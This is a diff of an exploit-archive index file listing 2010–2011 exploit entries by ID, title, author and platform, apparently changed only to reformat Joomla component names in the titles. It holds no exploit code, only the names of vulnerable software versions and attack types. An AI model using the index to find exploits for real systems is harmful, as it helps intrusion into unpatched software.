 15798,platforms/php/webapps/15798.txt,"Injader CMS - Multiple Vulnerabilities",2010-12-21,"High-Tech Bridge SA",php,webapps,0
 15799,platforms/php/webapps/15799.txt,"Habari Blog - Multiple Vulnerabilities",2010-12-21,"High-Tech Bridge SA",php,webapps,0
 15800,platforms/php/webapps/15800.txt,"html-edit CMS - Multiple Vulnerabilities",2010-12-21,"High-Tech Bridge SA",php,webapps,0
-15801,platforms/php/webapps/15801.txt,"Joomla! Component com_xgallery 1.0 - Local File Inclusion",2010-12-21,KelvinX,php,webapps,0
+15801,platforms/php/webapps/15801.txt,"Joomla! Component 'com_xgallery' 1.0 - Local File Inclusion",2010-12-21,KelvinX,php,webapps,0
 15802,platforms/windows/remote/15802.txt,"ecava IntegraXor 3.6.4000.0 - Directory Traversal",2010-12-21,"Luigi Auriemma",windows,remote,0
 15805,platforms/hardware/dos/15805.php,"Apple iOS Safari - 'JS .' Remote Crash",2010-12-22,"Yakir Wizman",hardware,dos,0
 15804,platforms/php/webapps/15804.txt,"jobappr 1.4 - Multiple Vulnerabilities",2010-12-21,giudinvx,php,webapps,0
@@ -13743,18 +13743,18 @@ id,file,description,date,author,platform,type,port
 15811,platforms/php/webapps/15811.txt,"Built2Go PHP Shopping - SQL Injection",2010-12-23,Br0ly,php,webapps,0
 15812,platforms/php/webapps/15812.txt,"Ypninc Realty Classifieds - SQL Injection",2010-12-23,Br0ly,php,webapps,0
 15813,platforms/php/webapps/15813.txt,"IPN Development Handler 2.0 - Multiple Vulnerabilities",2010-12-23,"AtT4CKxT3rR0r1ST ",php,webapps,0
-15814,platforms/php/webapps/15814.txt,"Joomla! Component com_ponygallery - Remote File Inclusion",2010-12-23,"AtT4CKxT3rR0r1ST ",php,webapps,0
-15815,platforms/php/webapps/15815.txt,"Joomla! Component com_adsmanager - Remote File Inclusion",2010-12-23,"AtT4CKxT3rR0r1ST ",php,webapps,0
+15814,platforms/php/webapps/15814.txt,"Joomla! Component 'com_ponygallery' - Remote File Inclusion",2010-12-23,"AtT4CKxT3rR0r1ST ",php,webapps,0
+15815,platforms/php/webapps/15815.txt,"Joomla! Component 'com_adsmanager' - Remote File Inclusion",2010-12-23,"AtT4CKxT3rR0r1ST ",php,webapps,0
 15816,platforms/php/webapps/15816.txt,"CubeCart 3.0.4 - SQL Injection",2010-12-23,Dr.NeT,php,webapps,0
 15818,platforms/php/webapps/15818.txt,"iDevSpot iDevCart 1.10 - Multiple Local File Inclusion",2010-12-24,v3n0m,php,webapps,0
-15819,platforms/php/webapps/15819.txt,"Joomla! Component com_xmovie 1.0 - Local File Inclusion",2010-12-24,KelvinX,php,webapps,0
+15819,platforms/php/webapps/15819.txt,"Joomla! Component 'com_xmovie' 1.0 - Local File Inclusion",2010-12-24,KelvinX,php,webapps,0
 15820,platforms/php/webapps/15820.txt,"SquareCMS 0.3.1 - (post.php) SQL Injection",2010-12-24,cOndemned,php,webapps,0
 15821,platforms/windows/dos/15821.py,"HttpBlitz Web Server - Denial of Service",2010-12-24,otoy,windows,dos,0
 15822,platforms/php/webapps/15822.html,"CubeCart 3.0.6 - Cross-Site Request Forgery (Add Admin)",2010-12-24,"P0C T34M",php,webapps,0
 15824,platforms/php/webapps/15824.txt,"Pligg 1.1.2 - Blind SQL Injection / Cross-Site Scripting",2010-12-25,"Michael Brooks",php,webapps,0
 15825,platforms/php/webapps/15825.txt,"openauto 1.6.3 - Multiple Vulnerabilities",2010-12-25,"Michael Brooks",php,webapps,0
 15826,platforms/php/webapps/15826.txt,"Traidnt Up 3.0 - Cross-Site Request Forgery",2010-12-25,"P0C T34M",php,webapps,0
-15827,platforms/php/webapps/15827.txt,"Joomla! Component com_idoblog - SQL Injection",2010-12-25,NOCKAR1111,php,webapps,0
+15827,platforms/php/webapps/15827.txt,"Joomla! Component 'com_idoblog' - SQL Injection",2010-12-25,NOCKAR1111,php,webapps,0
 15828,platforms/php/webapps/15828.txt,"Vacation Rental Script 4.0 - Cross-Site Request Forgery",2010-12-25,OnurTURKESHAN,php,webapps,0
 15838,platforms/php/webapps/15838.php,"OpenClassifieds 1.7.0.3 - Chained: Captcha Bypass / SQL Injection / Persistent Cross-Site Scripting on FrontPage",2010-12-28,"Michael Brooks",php,webapps,0
 15830,platforms/php/webapps/15830.txt,"Social Engine 4.x (Music Plugin) - Arbitrary File Upload",2010-12-25,MyDoom,php,webapps,0
@@ -13838,7 +13838,7 @@ id,file,description,date,author,platform,type,port
 15945,platforms/php/webapps/15945.txt,"Zwii 2.1.1 - Remote File Inclusion",2011-01-08,"Abdi Mohamed",php,webapps,0
 16123,platforms/hardware/remote/16123.txt,"Comcast DOCSIS 3.0 Business Gateways - Multiple Vulnerabilities",2011-02-06,"Trustwave's SpiderLabs",hardware,remote,0
 15946,platforms/windows/dos/15946.py,"IrfanView 4.28 - Multiple Denial of Service Vulnerabilities",2011-01-09,BraniX,windows,dos,0
-15958,platforms/php/webapps/15958.txt,"Joomla! Plugin Captcha 4.5.1 - Local File Disclosure",2011-01-09,dun,php,webapps,0
+15958,platforms/php/webapps/15958.txt,"Joomla! Plugin 'Captcha' 4.5.1 - Local File Disclosure",2011-01-09,dun,php,webapps,0
 15959,platforms/windows/dos/15959.pl,"Macro Express Pro 4.2.2.1 - '.MXE' File Syntactic Analysis Buffer Overflow (PoC)",2011-01-10,LiquidWorm,windows,dos,0
 15960,platforms/php/webapps/15960.txt,"Maximus CMS 1.1.2 - 'FCKeditor' Arbitrary File Upload",2011-01-10,eidelweiss,php,webapps,0
 15962,platforms/solaris/local/15962.c,"Linux Kernel (Solaris 10 / < 5.10 138888-01) - Privilege Escalation",2011-01-10,peri.carding,solaris,local,0
@@ -13863,7 +13863,7 @@ id,file,description,date,author,platform,type,port
 15987,platforms/cgi/webapps/15987.py,"SiteScape Enterprise Forum 7 - TCL Injection",2011-01-13,"Spencer McIntyre",cgi,webapps,0
 16020,platforms/php/webapps/16020.txt,"PHP Lowbids - viewfaqs.php Blind SQL Injection",2011-01-20,"BorN To K!LL",php,webapps,0
 15988,platforms/windows/dos/15988.py,"Objectivity/DB - Lack of Authentication Remote Exploit",2011-01-14,"Jeremy Brown",windows,dos,0
-15989,platforms/php/webapps/15989.txt,"Joomla! Component People 1.0.0 - SQL Injection",2011-01-14,"Salvatore Fresta",php,webapps,0
+15989,platforms/php/webapps/15989.txt,"Joomla! Component 'com_people' 1.0.0 - SQL Injection",2011-01-14,"Salvatore Fresta",php,webapps,0
 15992,platforms/windows/dos/15992.txt,"Sielco Sistemi Winlog 2.07.00 - Stack Overflow",2011-01-14,"Luigi Auriemma",windows,dos,0
 15993,platforms/php/webapps/15993.html,"viart shop 4.0.5 - Cross-Site Request Forgery",2011-01-15,Or4nG.M4N,php,webapps,0
 15994,platforms/windows/local/15994.rb,"eXtremeMP3 Player - Buffer Overflow (SEH)",2011-01-15,"C4SS!0 G0M3S",windows,local,0
@@ -13874,19 +13874,19 @@ id,file,description,date,author,platform,type,port
 15999,platforms/php/webapps/15999.txt,"BetMore Site Suite 4 - (bid) Blind SQL Injection",2011-01-16,"BorN To K!LL",php,webapps,0
 16002,platforms/windows/dos/16002.html,"ActiveX UserManager 2.03 - Buffer Overflow",2011-01-16,blake,windows,dos,0
 16000,platforms/php/webapps/16000.txt,"Seo Panel 2.2.0 - Cookie-Rendered Persistent Cross-Site Scripting",2011-01-16,"Mark Stanislav",php,webapps,0
-16001,platforms/php/webapps/16001.txt,"Joomla! Component People 1.0.0 - Local File Inclusion",2011-01-16,"ALTBTA ",php,webapps,0
+16001,platforms/php/webapps/16001.txt,"Joomla! Component 'com_people' 1.0.0 - Local File Inclusion",2011-01-16,"ALTBTA ",php,webapps,0
 16003,platforms/php/webapps/16003.txt,"AWBS 2.9.2 - (cart.php) Blind SQL Injection",2011-01-16,ShivX,php,webapps,0
 16004,platforms/php/webapps/16004.txt,"PHP-Fusion Teams Structure Infusion Addon - SQL Injection",2011-01-17,Saif,php,webapps,0
 16006,platforms/cgi/webapps/16006.html,"SmoothWall Express 3.0 - Multiple Vulnerabilities",2011-01-17,"dave b",cgi,webapps,0
 16009,platforms/windows/local/16009.pl,"A-PDF All to MP3 Converter 2.0.0 - '.wav' Buffer Overflow",2011-01-18,h1ch4m,windows,local,0
-16010,platforms/php/webapps/16010.txt,"Joomla! Component allCineVid 1.0.0 - Blind SQL Injection",2011-01-18,"Salvatore Fresta",php,webapps,0
+16010,platforms/php/webapps/16010.txt,"Joomla! Component 'com_allcinevid' 1.0.0 - Blind SQL Injection",2011-01-18,"Salvatore Fresta",php,webapps,0
 16011,platforms/php/webapps/16011.txt,"CakePHP 1.3.5 / 1.2.8 - Unserialize()",2011-01-18,felix,php,webapps,0
 16013,platforms/php/webapps/16013.html,"N-13 News 3.4 - Cross-Site Request Forgery (Admin Add)",2011-01-18,anT!-Tr0J4n,php,webapps,0
 16014,platforms/windows/remote/16014.html,"Novell iPrint 5.52 - ActiveX GetDriverSettings() Remote Exploit (ZDI-10-256)",2011-01-19,Dr_IDE,windows,remote,0
 17209,platforms/php/webapps/17209.txt,"SoftMP3 - SQL Injection",2011-04-24,mArTi,php,webapps,0
 17210,platforms/windows/local/17210.rb,"eZip Wizard 3.0 - Stack Buffer Overflow (Metasploit)",2011-04-25,Metasploit,windows,local,0
 16016,platforms/php/webapps/16016.txt,"Simploo CMS 1.7.1 - PHP Code Execution",2011-01-19,"David Vieira-Kurz",php,webapps,0
-16039,platforms/php/webapps/16039.txt,"Joomla! Component B2 Portfolio 1.0.0 - Multiple SQL Injections",2011-01-24,"Salvatore Fresta",php,webapps,0
+16039,platforms/php/webapps/16039.txt,"Joomla! Component 'com_b2portfolio' 1.0.0 - Multiple SQL Injections",2011-01-24,"Salvatore Fresta",php,webapps,0
 16018,platforms/php/webapps/16018.txt,"PHP auctions - 'viewfaqs.php' Blind SQL Injection",2011-01-19,"BorN To K!LL",php,webapps,0
 16019,platforms/php/webapps/16019.txt,"phpCMS 2008 - SQL Injection",2011-01-20,R3d-D3V!L,php,webapps,0
 16021,platforms/windows/dos/16021.c,"Look n stop - Local Denial of Service",2011-01-21,Heurs,windows,dos,0
@@ -14066,7 +14066,7 @@ id,file,description,date,author,platform,type,port
 16243,platforms/hardware/remote/16243.py,"iphone folders 2.5 - Directory Traversal",2011-02-25,"Khashayar Fereidani",hardware,remote,0
 16244,platforms/hardware/remote/16244.py,"iphone ifile 2.0 - Directory Traversal",2011-02-25,"Khashayar Fereidani",hardware,remote,0
 16245,platforms/hardware/remote/16245.py,"iphone mydocs 2.7 - Directory Traversal",2011-02-25,"Khashayar Fereidani",hardware,remote,0
-16246,platforms/php/webapps/16246.py,"Joomla! Component XCloner (com_xcloner-backupandrestore) - Remote Command Execution",2011-02-25,mr_me,php,webapps,0
+16246,platforms/php/webapps/16246.py,"Joomla! Component 'com_xcloner-backupandrestore' - Remote Command Execution",2011-02-25,mr_me,php,webapps,0
 16247,platforms/php/webapps/16247.txt,"Pragyan CMS 3.0 - Multiple Vulnerabilities",2011-02-25,"Villy and Abhishek Lyall",php,webapps,0
 16248,platforms/windows/dos/16248.pl,"eXPert PDF Reader 4.0 - Null Pointer Dereference and Heap Corruption",2011-02-26,LiquidWorm,windows,dos,0
 16249,platforms/php/webapps/16249.txt,"phreebooks r30rc4 - Multiple Vulnerabilities",2011-02-26,"AutoSec Tools",php,webapps,0
@@ -14798,7 +14798,7 @@ id,file,description,date,author,platform,type,port
 16991,platforms/windows/local/16991.txt,"Microsoft Source Code Analyzer for SQL Injection 1.3 - Improper Permissions",2011-03-17,LiquidWorm,windows,local,0
 16992,platforms/php/webapps/16992.txt,"Joomla! 1.6 - Multiple SQL Injections",2011-03-17,"Aung Khant",php,webapps,0
 16993,platforms/hardware/remote/16993.pl,"ACTi ASOC 2200 Web Configurator 2.6 - Remote Root Command Execution",2011-03-17,"Todor Donev",hardware,remote,0
-16995,platforms/php/webapps/16995.txt,"Joomla! Component com_booklibrary - SQL Injection",2011-03-17,"Marc Doudiet",php,webapps,0
+16995,platforms/php/webapps/16995.txt,"Joomla! Component 'com_booklibrary' - SQL Injection",2011-03-17,"Marc Doudiet",php,webapps,0
 16996,platforms/windows/dos/16996.rb,"Fake Webcam 6.1 - Local Crash (PoC)",2011-03-17,"Anastasios Monachos",windows,dos,0
 16997,platforms/php/webapps/16997.txt,"Tugux CMS 1.0_final - Multiple Vulnerabilities",2011-03-17,Aodrulez,php,webapps,0
 16998,platforms/windows/remote/16998.rb,"RealNetworks RealPlayer - CDDA URI Initialization (Metasploit)",2011-03-17,Metasploit,windows,remote,0
@@ -14920,11 +14920,11 @@ id,file,description,date,author,platform,type,port
 17128,platforms/php/webapps/17128.txt,"greenpants 0.1.7 - Multiple Vulnerabilities",2011-04-06,"Ptrace Security",php,webapps,0
 17129,platforms/php/webapps/17129.txt,"S40 CMS 0.4.2b - Local File Inclusion",2011-04-07,Osirys,php,webapps,0
 17196,platforms/windows/local/17196.html,"Gesytec ElonFmt ActiveX 1.1.14 - (ElonFmt.ocx) pid Item Buffer Overflow (SEH)",2011-04-21,LiquidWorm,windows,local,0
-17132,platforms/php/webapps/17132.py,"Joomla! Component com_virtuemart 1.1.7 - Blind SQL Injection",2011-04-08,"TecR0c and mr_me",php,webapps,0
+17132,platforms/php/webapps/17132.py,"Joomla! Component 'com_virtuemart' 1.1.7 - Blind SQL Injection",2011-04-08,"TecR0c and mr_me",php,webapps,0
 17133,platforms/windows/dos/17133.c,"Microsoft Windows XP - 'afd.sys' Local Kernel Denial of Service",2011-04-08,"Lufeng Li",windows,dos,0
 17134,platforms/php/webapps/17134.txt,"phpcollab 2.5 - Multiple Vulnerabilities",2011-04-08,"High-Tech Bridge SA",php,webapps,0
 17135,platforms/php/webapps/17135.txt,"viscacha 0.8.1 - Multiple Vulnerabilities",2011-04-08,"High-Tech Bridge SA",php,webapps,0
-17136,platforms/php/webapps/17136.txt,"Joomla! Component JCE (com_jce) - Blind SQL Injection",2011-04-09,eidelweiss,php,webapps,0
+17136,platforms/php/webapps/17136.txt,"Joomla! Component 'com_jce' - Blind SQL Injection",2011-04-09,eidelweiss,php,webapps,0
 17137,platforms/php/webapps/17137.txt,"Nooms CMS 1.1.1 - Cross-Site Request Forgery",2011-04-09,loneferret,php,webapps,0
 17178,platforms/php/webapps/17178.txt,"Blue Hat - Sensitive Database Disclosure / SQL Injection",2011-04-16,^Xecuti0N3r,php,webapps,0
 17179,platforms/php/webapps/17179.txt,"Bedder CMS - Blind SQL Injection",2011-04-16,^Xecuti0N3r,php,webapps,0
@@ -15024,8 +15024,8 @@ id,file,description,date,author,platform,type,port
 17251,platforms/php/webapps/17251.html,"VCalendar 1.1.5 - Cross-Site Request Forgery",2011-05-06,"High-Tech Bridge SA",php,webapps,0
 17252,platforms/windows/remote/17252.rb,"VideoLAN VLC Media Player - ModPlug ReadS3M Stack Buffer Overflow (Metasploit)",2011-04-08,Metasploit,windows,remote,0
 17259,platforms/cgi/webapps/17259.txt,"f-fileman 7.0 - Directory Traversal",2011-05-07,"Raffaele Forte",cgi,webapps,0
-17264,platforms/php/webapps/17264.txt,"Joomla! Component com_versioning - SQL Injection",2011-05-09,the_cyber_nuxbie,php,webapps,0
-17265,platforms/php/webapps/17265.txt,"Joomla! Component com_hello - SQL Injection",2011-05-09,the_cyber_nuxbie,php,webapps,0
+17264,platforms/php/webapps/17264.txt,"Joomla! Component 'com_versioning' - SQL Injection",2011-05-09,the_cyber_nuxbie,php,webapps,0
+17265,platforms/php/webapps/17265.txt,"Joomla! Component 'com_hello' - SQL Injection",2011-05-09,the_cyber_nuxbie,php,webapps,0
 17266,platforms/windows/dos/17266.txt,"serva32 1.2.00 rc1 - Multiple Vulnerabilities",2011-05-10,"AutoSec Tools",windows,dos,0
 17267,platforms/php/webapps/17267.txt,"Traidnt UP 2.0 - (view.php) SQL Injection",2011-05-10,ScOrPiOn,php,webapps,0
 17268,platforms/windows/remote/17268.rb,"SPlayer 3.7 - Content-Type Buffer Overflow (Metasploit)",2011-05-11,Metasploit,windows,remote,0
@@ -15041,7 +15041,7 @@ id,file,description,date,author,platform,type,port
 17284,platforms/php/webapps/17284.txt,"WordPress Plugin EditorMonkey 2.5 - 'FCKeditor' Arbitrary File Upload",2011-05-14,kaMtiEz,php,webapps,0
 17285,platforms/php/webapps/17285.php,"osCommerce 2.3.1 - (banner_manager.php) Arbitrary File Upload",2011-05-14,"Number 7",php,webapps,0
 17287,platforms/windows/dos/17287.mid,"Winamp 5.61 - 'in_midi' Component heap Overflow (crash only)",2011-05-15,"Alexander Gavrun",windows,dos,0
-17288,platforms/php/webapps/17288.txt,"Joomla! Component com_question - SQL Injection",2011-05-15,"NeX HaCkEr",php,webapps,0
+17288,platforms/php/webapps/17288.txt,"Joomla! Component 'com_question' - SQL Injection",2011-05-15,"NeX HaCkEr",php,webapps,0
 17289,platforms/php/webapps/17289.txt,"frame-oshop - SQL Injection",2011-05-15,-SmoG-,php,webapps,0
 17290,platforms/hardware/remote/17290.txt,"XtreamerPRO Media-player 2.6.0 / 2.7.0 - Multiple Vulnerabilities",2011-05-16,"Itzik Chen",hardware,remote,0
 17291,platforms/windows/dos/17291.py,"Steam Software - Denial of Service",2011-05-16,david.r.klein,windows,dos,0
@@ -15056,7 +15056,7 @@ id,file,description,date,author,platform,type,port
 17300,platforms/windows/remote/17300.rb,"7-Technologies IGSS 9.00.00 b11063 - IGSSdataServer.exe Stack Overflow (Metasploit)",2011-05-16,Metasploit,windows,remote,0
 17302,platforms/windows/local/17302.py,"Sonique 1.96 - '.m3u' Buffer Overflow",2011-05-17,sinfulsecurity,windows,local,0
 17301,platforms/php/webapps/17301.txt,"Pligg 1.1.4 - SQL Injection",2011-05-17,Null-0x00,php,webapps,0
-17303,platforms/php/webapps/17303.txt,"Joomla! Component 1.0 jDownloads - Arbitrary File Upload",2011-05-18,Al-Ghamdi,php,webapps,0
+17303,platforms/php/webapps/17303.txt,"Joomla! Component 1.0 'com_jdownloads' - Arbitrary File Upload",2011-05-18,Al-Ghamdi,php,webapps,0
 17304,platforms/windows/remote/17304.txt,"Cisco Unified Operations Manager - Multiple Vulnerabilities",2011-05-18,"Sense of Security",windows,remote,0
 17305,platforms/windows/dos/17305.py,"Microsoft Windows Vista/Server 2008 - 'nsiproxy.sys' Local Kernel Denial of Service",2011-05-18,"Lufeng Li",windows,dos,0
 17306,platforms/windows/local/17306.pl,"SpongeBob SquarePants Typing - Buffer Overflow (SEH)",2011-05-18,"Infant Overflow",windows,local,0
@@ -15082,9 +15082,9 @@ id,file,description,date,author,platform,type,port
 17335,platforms/php/webapps/17335.txt,"Duhok Forum 1.1 - SQL Injection",2011-05-28,M.Jock3R,php,webapps,0
 17336,platforms/php/webapps/17336.txt,"Guru Penny Auction Pro 3.0 - Blind SQL Injection",2011-05-28,v3n0m,php,webapps,0
 17345,platforms/windows/remote/17345.py,"HP Data Protector Client 6.11 - EXEC_SETUP Remote Code Execution PoC (ZDI-11-056)",2011-05-29,fdiskyou,windows,remote,0
-17338,platforms/php/webapps/17338.txt,"Joomla! Component com_jmsfileseller - Local File Inclusion",2011-05-28,Valentin,php,webapps,0
+17338,platforms/php/webapps/17338.txt,"Joomla! Component 'com_jmsfileseller' - Local File Inclusion",2011-05-28,Valentin,php,webapps,0
 17339,platforms/windows/remote/17339.py,"HP Data Protector Client 6.11 - EXEC_CMD Remote Code Execution PoC (ZDI-11-055)",2011-05-28,fdiskyou,windows,remote,0
-17341,platforms/php/webapps/17341.txt,"Joomla! Component com_joomnik - SQL Injection",2011-05-29,SOLVER,php,webapps,0
+17341,platforms/php/webapps/17341.txt,"Joomla! Component 'com_joomnik' - SQL Injection",2011-05-29,SOLVER,php,webapps,0
 17343,platforms/php/webapps/17343.txt,"Puzzle Apps CMS 3.2 - Local File Inclusion",2011-05-29,"Treasure Priyamal",php,webapps,0
 17344,platforms/php/webapps/17344.txt,"Invisionix Roaming System Remote metasys 0.2 - Local File Inclusion",2011-05-29,"Treasure Priyamal",php,webapps,0
 17346,platforms/php/webapps/17346.php,"w-Agora Forum 4.2.1 - Arbitrary File Upload",2011-05-30,"Treasure Priyamal",php,webapps,0
@@ -15129,7 +15129,7 @@ id,file,description,date,author,platform,type,port
 17391,platforms/linux/local/17391.c,"Linux Kernel 2.6.28 / 3.0 (DEC Alpha Linux) - Privilege Escalation",2011-06-11,"Dan Rosenberg",linux,local,0
 17392,platforms/windows/remote/17392.rb,"IBM Tivoli Endpoint Manager - POST Query Buffer Overflow (Metasploit)",2011-06-12,Metasploit,windows,remote,0
 17393,platforms/multiple/webapps/17393.txt,"Oracle HTTP Server - Cross-Site Scripting Header Injection",2011-06-13,"Yasser ABOUKIR",multiple,webapps,0
-17394,platforms/php/webapps/17394.txt,"Joomla! Plugin Scriptegrator 1.5 - File Inclusion",2011-06-13,jdc,php,webapps,0
+17394,platforms/php/webapps/17394.txt,"Joomla! Component 'Scriptegrator' 1.5 - File Inclusion",2011-06-13,jdc,php,webapps,0
 17395,platforms/php/webapps/17395.txt,"cubecart 2.0.7 - Multiple Vulnerabilities",2011-06-14,Shamus,php,webapps,0
 17396,platforms/windows/dos/17396.html,"Opera Web Browser 11.11 - Remote Crash",2011-06-14,echo,windows,dos,0
 17398,platforms/windows/dos/17398.txt,"Microsoft Windows Media Player with K-Lite Codec Pack - Denial of Service (PoC)",2011-06-14,"Nicolas Krassas",windows,dos,0
@@ -15144,10 +15144,10 @@ id,file,description,date,author,platform,type,port
 17408,platforms/php/webapps/17408.txt,"WeBid 1.0.2 - Persistent Cross-Site Scripting (via SQL Injection)",2011-06-17,Saif,php,webapps,0
 17409,platforms/windows/remote/17409.rb,"Microsoft Internet Explorer - MSHTML!CObjectElement Use-After-Free (MS11-050)",2011-06-17,Metasploit,windows,remote,0
 17410,platforms/php/webapps/17410.txt,"AiCart 2.0 - Multiple Vulnerabilities",2011-06-18,takeshix,php,webapps,0
-17411,platforms/php/webapps/17411.txt,"Joomla! Component A Cool Debate 1.0.3 - Local File Inclusion",2011-06-18,"Chip d3 bi0s",php,webapps,0
-17412,platforms/php/webapps/17412.txt,"Joomla! Component com_team - SQL Injection",2011-06-19,CoBRa_21,php,webapps,0
+17411,platforms/php/webapps/17411.txt,"Joomla! Component 'com_acooldebate' 1.0.3 - Local File Inclusion",2011-06-18,"Chip d3 bi0s",php,webapps,0
+17412,platforms/php/webapps/17412.txt,"Joomla! Component 'com_team' - SQL Injection",2011-06-19,CoBRa_21,php,webapps,0
 17413,platforms/php/webapps/17413.txt,"Burning Board 3.1.5 - Full Path Disclosure",2011-06-19,linc0ln.dll,php,webapps,0
-17414,platforms/php/webapps/17414.txt,"Joomla! Component Calc Builder - 'id' Blind SQL Injection",2011-06-19,"Chip d3 bi0s",php,webapps,0
+17414,platforms/php/webapps/17414.txt,"Joomla! Component 'com_calcbuilder' - 'id' Parameter Blind SQL Injection",2011-06-19,"Chip d3 bi0s",php,webapps,0
 17415,platforms/windows/remote/17415.rb,"Black Ice Cover Page SDK - insecure method DownloadImageFileURL() Exploit (Metasploit)",2011-06-20,mr_me,windows,remote,0
 17416,platforms/windows/remote/17416.html,"Black Ice Fax Voice SDK 12.6 - Remote Code Execution",2011-06-20,mr_me,windows,remote,0
 17417,platforms/windows/remote/17417.rb,"DATAC RealWin SCADA Server 2 - On_FC_CONNECT_FCS_a_FILE Buffer Overflow (Metasploit)",2011-06-20,Metasploit,windows,remote,0
@@ -15177,7 +15177,7 @@ id,file,description,date,author,platform,type,port
 17450,platforms/windows/remote/17450.rb,"Siemens FactoryLink 8 - CSService Logging Path Parameter Buffer Overflow (Metasploit)",2011-06-25,Metasploit,windows,remote,0
 17448,platforms/windows/remote/17448.rb,"Lotus Notes 8.0.x < 8.5.2 FP2 - Autonomy Keyview (.lzh attachment)",2011-06-23,Metasploit,windows,remote,0
 17451,platforms/windows/local/17451.rb,"Microsoft Visio - 'VISIODWG.dll' .DXF File Handling (Metasploit)",2011-06-26,Metasploit,windows,local,0
-17452,platforms/php/webapps/17452.txt,"Joomla! Component JoomlaXi - Persistent Cross-Site Scripting",2011-06-26,"Karthik R",php,webapps,0
+17452,platforms/php/webapps/17452.txt,"Joomla! Component 'JoomlaXi' - Persistent Cross-Site Scripting",2011-06-26,"Karthik R",php,webapps,0
 17453,platforms/php/webapps/17453.txt,"WordPress Plugin Beer Recipes 1.0 - Cross-Site Scripting",2011-06-26,TheUzuki.',php,webapps,0
 17457,platforms/php/webapps/17457.txt,"rgboard 4.2.1 - SQL Injection",2011-06-28,hamt0ry,php,webapps,0
 17458,platforms/windows/dos/17458.txt,"HP Data Protector 6.20 - Multiple Vulnerabilities",2011-06-29,"Core Security",windows,dos,0
@@ -15186,7 +15186,7 @@ id,file,description,date,author,platform,type,port
 17461,platforms/windows/dos/17461.txt,"HP Data Protector 6.20 - EXEC_CMD Buffer Overflow",2011-06-30,"Core Security",windows,dos,0
 17462,platforms/freebsd/remote/17462.txt,"FreeBSD OpenSSH 3.5p1 - Remote Root Exploit",2011-06-30,kingcope,freebsd,remote,0
 17463,platforms/linux/dos/17463.pl,"Rhythmbox - '.m3u' Local Crash (PoC)",2011-06-30,Caddy-Dz,linux,dos,0
-17464,platforms/php/webapps/17464.txt,"Joomla! Component mdigg - SQL Injection",2011-07-01,"Caddy Dz",php,webapps,0
+17464,platforms/php/webapps/17464.txt,"Joomla! Component 'mdigg' - SQL Injection",2011-07-01,"Caddy Dz",php,webapps,0
 17465,platforms/php/webapps/17465.txt,"WordPress 3.1.3 - SQL Injection",2011-07-01,"SEC Consult",php,webapps,0
 17466,platforms/php/webapps/17466.txt,"Ollance Member Login Script - Multiple Vulnerabilities",2011-07-01,"$#4d0\/\/[r007k17]",php,webapps,0
 17467,platforms/windows/remote/17467.rb,"HP - OmniInet.exe Opcode 27 Buffer Overflow (Metasploit)",2011-07-01,Metasploit,windows,remote,5555
@@ -15241,11 +15241,11 @@ id,file,description,date,author,platform,type,port
 17522,platforms/php/webapps/17522.txt,"Fire Soft Board 2.0.1 - Persistent Cross-Site Scripting (Admin Panel)",2011-07-12,"_jill for A-S",php,webapps,0
 17523,platforms/php/webapps/17523.txt,"Tradingeye E-Commerce Shopping Cart - Multiple Vulnerabilities",2011-07-12,"$#4d0\/\/[r007k17]",php,webapps,0
 17524,platforms/php/webapps/17524.html,"Pandora Fms 3.2.1 - Cross-Site Request Forgery",2011-07-12,"mehdi boukazoula",php,webapps,0
-17525,platforms/php/webapps/17525.txt,"Joomla! Component Xmap 1.2.11 - Blind SQL Injection",2011-07-12,jdc,php,webapps,0
+17525,platforms/php/webapps/17525.txt,"Joomla! Component 'com_xmap' 1.2.11 - Blind SQL Injection",2011-07-12,jdc,php,webapps,0
 17527,platforms/windows/remote/17527.py,"Solar FTP Server 2.1.1 - PASV Buffer Overflow (PoC)",2011-07-12,"Craig Freyman",windows,remote,0
 17528,platforms/php/webapps/17528.txt,"LiteRadius 3.2 - Multiple Blind SQL Injection",2011-07-13,"Robert Cooper",php,webapps,0
 17529,platforms/php/webapps/17529.txt,"TCExam 11.2.011 - Multiple SQL Injections",2011-07-13,LiquidWorm,php,webapps,0
-17530,platforms/php/webapps/17530.txt,"Joomla! Component SOBI2 2.9.3.2 - Blind SQL Injections",2011-07-14,jdc,php,webapps,0
+17530,platforms/php/webapps/17530.txt,"Joomla! Component 'com_sobi2' 2.9.3.2 - Blind SQL Injections",2011-07-14,jdc,php,webapps,0
 17531,platforms/php/webapps/17531.txt,"PG eLms Pro vDEC_2007_01 - 'contact_us.php' Multiple POST Cross-Site Scripting Vulnerabilities",2011-07-14,LiquidWorm,php,webapps,0
 17532,platforms/php/webapps/17532.txt,"PG eLms Pro vDEC_2007_01 - Multiple Blind SQL Injection",2011-07-14,LiquidWorm,php,webapps,0
 17533,platforms/php/webapps/17533.txt,"Inscribe Webmedia - SQL Injection",2011-07-14,Netrondoank,php,webapps,0
@@ -15258,17 +15258,17 @@ id,file,description,date,author,platform,type,port
 17544,platforms/windows/dos/17544.txt,"GDI+ - 'gdiplus.dll' CreateDashedPath Integer Overflow",2011-07-18,Abysssec,windows,dos,0
 17545,platforms/win_x86/shellcode/17545.txt,"Win32/PerfectXp-pc1/SP3 TR - Add Admin _kpss_ Shellcode (112 bytes)",2011-07-18,KaHPeSeSe,win_x86,shellcode,0
 17546,platforms/windows/remote/17546.py,"Freefloat FTP Server 1.0 - 'REST' / 'PASV' Buffer Overflow",2011-07-18,"C4SS!0 G0M3S",windows,remote,0
-17553,platforms/php/webapps/17553.txt,"Joomla! Component Appointment Booking Pro - Local File Inclusion",2011-07-20,"Don Tukulesto",php,webapps,0
+17553,platforms/php/webapps/17553.txt,"Joomla! Component 'com_rsappt_pro2' - Local File Inclusion",2011-07-20,"Don Tukulesto",php,webapps,0
 17554,platforms/php/webapps/17554.txt,"Mevin Basic PHP Events Lister 2.03 - Cross-Site Request Forgery",2011-07-21,Crazy_Hacker,php,webapps,0
 17548,platforms/windows/remote/17548.rb,"Freefloat FTP Server - 'REST' Buffer Overflow (Metasploit)",2011-07-19,KaHPeSeSe,windows,remote,0
 17549,platforms/multiple/dos/17549.txt,"Lotus Domino SMTP Router & Email Server and Client - Denial of Service",2011-07-19,Unknown,multiple,dos,0
 17550,platforms/windows/remote/17550.py,"Freefloat FTP Server 1.0 - 'ACCL' Buffer Overflow",2011-07-19,mortis,windows,remote,0
 17551,platforms/jsp/webapps/17551.txt,"Oracle Sun GlassFish Enterprise Server - Persistent Cross-Site Scripting",2011-07-20,"Sense of Security",jsp,webapps,0
 17555,platforms/php/webapps/17555.txt,"vBulletin 4.0.x 4.1.3 - (messagegroupid) SQL Injection",2011-07-21,fb1h2s,php,webapps,0
